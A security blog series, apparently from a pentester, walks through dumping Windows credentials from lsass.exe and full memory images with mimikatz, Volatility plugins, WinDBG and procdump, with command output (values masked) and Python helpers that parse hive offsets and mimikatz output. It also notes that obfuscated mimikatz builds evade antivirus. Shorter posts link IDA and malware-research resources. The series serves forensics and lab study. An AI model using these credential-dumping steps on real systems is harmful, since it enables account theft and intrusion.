Windows Credentials and Memory Dumps – Part 4: Volatility & Mimikatz

For this test I installed everything in a WinXP VM. I followed these instructions:
… with only small changes, because I had a win32 machine.
First things first: the plugin seems to be a PoC and supports Windows Vista and 7, 32 and 64 bit (maybe it works for Windows Server 2008 too?).
Here are the steps for installing volatility with the plugin:
Download & install Python 2.7.x from https://www.python.org/downloads/release
Download & install Microsoft Visual C++ Compiler for Python 2.7 https://www.microsoft.com/en-us/download/details.aspx?id=44266
(I don't know whether that was really necessary.)
C:\Python27\Scripts>python.exe -m pip install distorm3
C:\Python27\Scripts>python.exe -m pip install Pycrypto
C:\Python27\Scripts>python.exe -m pip install yara
C:\Python27\Scripts>python.exe -m pip install construct
I downloaded the mimikatz plugin for volatility from:
and stored it in c:\volatility-plugins.
Check:
C:\>python.exe "c:\Python27\Scripts\vol.py" --plugins="c:\volatility-plugins" --info | findstr /i mimi
Volatility Foundation Volatility Framework 2.4
linux_slabinfo             - Mimics /proc/slabinfo on a running machine
mimikatz                   - mimikatz offline
Success…
Then copy the test.elf image from part 1 to the VM.
Now it is possible to fetch the credentials in clear text:
C:\>python "c:\python27\scripts\vol.py" --plugins="c:\volatility-plugins" -f "z:\DAXAMD-20160124-111555.raw" --profile=Win7SP0x64 mimikatz
Volatility Foundation Volatility Framework 2.4
Module   User             Domain           Password
-------- ---------------- ---------------- ----------------------------------------
wdigest  __vmware_user__  daxamd           XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
wdigest  dax              daxamd           XXXXXXXXXXXXXXXXXX
wdigest  DAXAMD$          WORKGROUP

Memdumps, Volatility, Mimikatz, VMs – Part 3: WinDBG Mimikatz Extension

Now this is interesting. It is possible to load a full memory dump into WinDBG, load mimikatz as an extension and dump the credentials in cleartext. For this I used the dump of the Windows 7 machine from part 2.
For this:
– Download & Install WinDBG
– Download MoonSols Windows Memory Toolkit (http://www.moonsols.com/windows-memory-toolkit/)
Convert the memory image:
C:\Users\dax\Downloads\MWMT-v1.4>bin2dmp.exe ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.raw ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.dmp
Note: Don't use the Volatility built-in function raw2dmp for this task. This did not work for me.
In WinDBG:
– For x64 dump start WinDBG (x64)
– Open the crashdump
Then:
0: kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
0: kd> .SymFix
0: kd> .Reload
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
……………………………………….
Loading User Symbols
…..
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
Loading Wow64 Symbols
……………..
0: kd> !process 0 0 lsass.exe
PROCESS fffffa80072b2b10
    SessionId: 0  Cid: 01dc    Peb: 7fffffd6000  ParentCid: 0188
    DirBase: 137127000  ObjectTable: fffff8a001159230  HandleCount: 660.
    Image: lsass.exe
0: kd> .process /r /p fffffa80072b2b10
Implicit process is now fffffa80`072b2b10
Loading User Symbols
……………………………………………………….
0: kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 835674 (00000000:000cc05a)
Session           : Interactive from 0
User Name         : __vmware_user__
Domain            : daxamd
Logon Server      : DAXAMD
Logon Time        : 24.01.2016 12:09:33
SID               : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    msv :
     [00010000] CredentialKeys
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     [00000003] Primary
     * Username : __vmware_user__
     * Domain   : daxamd
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    tspkg : KO
    wdigest :
     * Username : __vmware_user__
     * Domain   : daxamd
     * Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    kerberos :
     * Username : __vmware_user__
     * Domain   : daxamd
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 221616 (00000000:000361b0)
Session           : Interactive from 1
User Name         : dax
Domain            : daxamd
Logon Server      : DAXAMD
Logon Time        : 24.01.2016 12:07:40
SID               : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    msv :
     [00000003] Primary
     * Username : dax
     * Domain   : daxamd
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     [00010000] CredentialKeys
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    tspkg : KO
    wdigest :
     * Username : dax
     * Domain   : daxamd
     * Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    kerberos :
     * Username : dax
     * Domain   : daxamd
     * Password : (null)
— cut —
Again, I found this one awesome.
Links:

Memdumps, Volatility, Mimikatz, VMs – Part 2: Windows 7 Full Memory Dump & Get Hashes

For this part we first make a memory dump with the MoonSols DumpIt.exe tool (using my physical Windows 7 x64 machine):
The next steps are simple Volatility calls, like getting the basic image information:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Downloads\volatility_2.5.win.standalone\DAXAMD-20160124-111555.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002ff20f0L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002ff3d00L
                KPCR for CPU 1 : 0xfffff880009e8000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-24 11:16:03 UTC+0000
     Image local date and time : 2016-01-24 12:16:03 +0100
Get the hivelist:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw hivelist --profile Win7SP1x64
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a00000f010 0x0000000153e5d010 [no name]
0xfffff8a0000231f0 0x0000000153e1f1f0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000062010 0x0000000150d76010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000121010 0x0000000149c8e010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a000d55010 0x0000000148258010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000e04200 0x000000013b7ad200 \SystemRoot\System32\Config\DEFAULT
0xfffff8a001219010 0x0000000132d35010 \SystemRoot\System32\Config\SECURITY
0xfffff8a001290010 0x0000000131e09010 \SystemRoot\System32\Config\SAM
0xfffff8a00143c010 0x000000012fa23010 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a00151a240 0x000000012c2b9240 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a002261010 0x000000010db7f010 \??\C:\Users\dax\ntuser.dat
0xfffff8a0022f6410 0x0000000148132410 \??\C:\Users\dax\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a004e77010 0x0000000110fea010 \??\C:\System Volume Information\Syscache.hve
0xfffff8a00ceae010 0x000000007eeb9010 \??\C:\Windows\System32\config\COMPONENTS
Help!
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -h
Volatility Foundation Volatility Framework 2.5
Usage: Volatility - A memory forensics analysis platform.
Options:
  -h, --help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  --conf-file=.volatilityrc
                        User based configuration file
  -d, --debug           Debug volatility
  --plugins=PLUGINS     Additional plugin directories to use (semi-colon
                        separated)
  --info                Print information about all registered objects
  --cache-directory=C:\Users\dax/.cache\volatility
                        Directory where cache files are stored
  --cache               Use caching
  --tz=TZ               Sets the (Olson) timezone for displaying timestamps
                        using pytz (if installed) or tzset
  -f FILENAME, --filename=FILENAME
                        Filename to use when opening an image
  --profile=WinXPSP2x86
                        Name of the profile to load (use --info to see a list
                        of supported profiles)
  -l LOCATION, --location=LOCATION
                        A URN location from which to load an address space
  -w, --write           Enable write support
  --dtb=DTB             DTB Address
  --shift=SHIFT         Mac KASLR shift address
  --output=text         Output in this format (support is module specific, see
                        the Module Output Options below)
  --output-file=OUTPUT_FILE
                        Write output in this file
  -v, --verbose         Verbose information
  -g KDBG, --kdbg=KDBG  Specify a KDBG virtual address (Note: for 64-bit
                        Windows 8 and above this is the address of
                        KdCopyDataBlock)
  --force               Force utilization of suspect profile
  -k KPCR, --kpcr=KPCR  Specify a specific KPCR address
  --cookie=COOKIE       Specify the address of nt!ObHeaderCookie (valid for
                        Windows 10 only)
  -y SYS_OFFSET, --sys-offset=SYS_OFFSET
                        SYSTEM hive offset (virtual)
  -s SAM_OFFSET, --sam-offset=SAM_OFFSET
                        SAM hive offset (virtual)
Module Output Options: dot, greptext, html, json, sqlite, text, xlsx
---------------------------------
Module HashDump
---------------------------------
Dumps passwords hashes (LM/NTLM) from memory
What we need for getting the hashes (both values come from the hivelist output above):
-y = virtual offset of the SYSTEM hive
-s = virtual offset of the SAM hive
Dump the hashes:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f DAXAMD-20160124-111555.raw --profile Win7SP1x64 -y 0xfffff8a0000231f0 -s 0xfffff8a001290010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1001:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
HomeGroupUser$:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
otto:1007:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
__vmware_user__:1015:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
UpdatusUser:1016:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
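The hivelist-then-hashdump procedure above, as an added example (not code from the original post or from Volatility itself): it parses hivelist output, picks the SYSTEM and SAM virtual offsets that the -y and -s switches need, and refuses to continue when one of the hives is not in the list. The function names and the trimmed sample text are my own.

```python
import re

# Hivelist output copied from the walkthrough above (a few hives omitted for brevity).
HIVELIST_OUTPUT = r"""Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a00000f010 0x0000000153e5d010 [no name]
0xfffff8a0000231f0 0x0000000153e1f1f0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000062010 0x0000000150d76010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000121010 0x0000000149c8e010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a001290010 0x0000000131e09010 \SystemRoot\System32\Config\SAM
0xfffff8a004e77010 0x0000000110fea010 \??\C:\System Volume Information\Syscache.hve
"""

# One hive per line: virtual address, physical address, then a name that may contain spaces.
HIVE_LINE = re.compile(r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(.+?)\s*$", re.I)

def parse_hivelist(text):
    """Return (virtual, physical, name) tuples for every hive line in hivelist output."""
    hives = []
    for line in text.splitlines():
        m = HIVE_LINE.match(line.strip())
        if m:
            hives.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3)))
    return hives

def find_hive_offsets(text):
    """Pick the SYSTEM and SAM hives by the last component of their registry path.
    Raises ValueError if either is absent (e.g. not found in the image), because
    hashdump needs both offsets."""
    offsets = {}
    for virt, _phys, name in parse_hivelist(text):
        tail = name.rsplit("\\", 1)[-1].upper()
        if tail == "SYSTEM":
            offsets["system"] = virt
        elif tail == "SAM":
            offsets["sam"] = virt
    missing = sorted({"system", "sam"} - set(offsets))
    if missing:
        raise ValueError("hive(s) missing from hivelist: " + ", ".join(missing))
    return offsets

def hashdump_args(image, profile, offsets):
    """Argument list for the hashdump call shown above (hypothetical helper)."""
    return ["hashdump", "-f", image, "--profile", profile,
            "-y", "0x%x" % offsets["system"], "-s", "0x%x" % offsets["sam"]]
```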
Link:

Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump

Part 1 is simple. Dump the lsass.exe process and use mimikatz for getting the credentials as clear text and the hashes. You need admin or system rights for this.
But first, as a short reminder, let's have a look at the "normal" way of dumping credentials from the lsass.exe process with mimikatz:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
— cut —
If you do not have a self-compiled or otherwise obfuscated mimikatz build, every antivirus scanner will do its work. But it is also possible to read the credentials from a memory dump.
Make a memory dump with Process Explorer:
… remember to make a full dump.
Or use procdump:
procdump -accepteula -ma lsass.exe lsass.dmp
which is much better for pentesters who only have shell access.
For dumping the credentials in clear text use mimikatz:
mimikatz # sekurlsa::minidump e:\lsass.dmp
Switch to MINIDUMP : 'e:\lsass.dmp'
mimikatz # sekurlsa::logonPasswords
Opening : 'e:\lsass.dmp' file for minidump...
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
Domain            : DAX-RYMZ48Z3EYO
Logon Server      : DAX-RYMZ48Z3EYO
Logon Time        : 23.01.2016 14:42:11
SID               : S-1-5-21-436374069-688789844-839522115-1003
        msv :
         [00000002] Primary
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * LM       : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * NTLM     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * SHA1     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        wdigest :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
        kerberos :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
— cut —
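The sekurlsa::logonpasswords listings in part 3 and part 1 above share one layout, so here is an added example (my own code, not from the post or from mimikatz) that parses that layout into one record per logon session and reports which providers still held a cleartext password. This is useful when verifying on a lab machine whether hardening actually removed cleartext from LSASS memory; the password values themselves are never stored. The sample text is constructed from the masked output above.

```python
import re

# Constructed sample in the sekurlsa::logonpasswords layout shown above (values masked).
SAMPLE = """Authentication Id : 0 ; 835674 (00000000:000cc05a)
User Name         : __vmware_user__
Domain            : daxamd
    msv :
     [00000003] Primary
    tspkg : KO
    wdigest :
     * Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    kerberos :
     * Password : (null)
Authentication Id : 0 ; 999 (00000000:000003e7)
User Name         : DAXAMD$
Domain            : WORKGROUP
    wdigest :
     * Password : (null)
"""

SESSION_START = re.compile(r"^Authentication Id\s*:\s*(.+)$")
TOP_FIELD = re.compile(r"^(User Name|Domain)\s*:\s*(.*)$")  # column-0 fields only
PACKAGE = re.compile(r"^\s+(\w+)\s*:\s*(KO)?\s*$")          # "    wdigest :" / "    tspkg : KO"
PASSWORD = re.compile(r"^\s+\*\s*Password\s*:\s*(.*)$")

def cleartext_exposure(text):
    """One record per logon session, listing the providers that still held a
    cleartext password. The value is only inspected for "(null)", never kept."""
    sessions, cur, pkg = [], None, None
    for line in text.splitlines():
        m = SESSION_START.match(line)
        if m:
            cur = {"auth_id": m.group(1).strip(), "user": None, "domain": None, "cleartext": []}
            sessions.append(cur)
            continue
        if cur is None:
            continue
        m = TOP_FIELD.match(line)
        if m:
            cur["user" if m.group(1) == "User Name" else "domain"] = m.group(2).strip()
            continue
        m = PACKAGE.match(line)
        if m:
            pkg = m.group(1)  # msv, tspkg, wdigest, kerberos, ...
            continue
        m = PASSWORD.match(line)
        if m and pkg and m.group(1).strip() not in ("", "(null)"):
            cur["cleartext"].append(pkg)
    return sessions
```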
Links:

Memdumps, Volatility, Mimikatz, VMs – Overview

Over the last weeks I experimented with how to get user credentials from memory dumps, and hopefully I will have the time to continue this little "research" (I know, it is not really research when you just write up stuff 😉). There are many different ways to dump credentials as hashes or in cleartext from various types of memory dumps, so I think this will become a few short articles. I added links to sources and more in-depth information.
Highly interesting for me is how to obtain memory dumps from virtual machines when you have access to the host system. Further, I will have a look at countermeasures in a later part (by which I mean monitoring and logging).
Overview

Very first steps with IDA

Recently I started using IDA. For me it has a steep learning curve, and some people I talked to agreed. So here are a few links for the first steps if you want to get into IDA. I assume you already know assembly and what reversing is. Of course there are many more on the web, but these are the ones I felt comfortable with at the moment. If you have good links about it, let me know.
Dynamic Analysis
Static Analysis
This looks good but is in German: http://blog.tr4ceflow.com/tools/ida-pro-65.html
For training do crackmes:
Further I found these links useful:

Some Great Links for Malware Research

Last week I attended this year's BruCON, where I had the chance to participate in the Malware Triage workshop by https://twitter.com/herrcore and https://twitter.com/seanmw. The workshop is awesome (look here to get the idea: http://herrcore.blogspot.de/2014/09/crowdsourced-malware-triage.html) and if you have the chance to take it, go for it! The links here are from their slides and I post them with their agreement (thank you):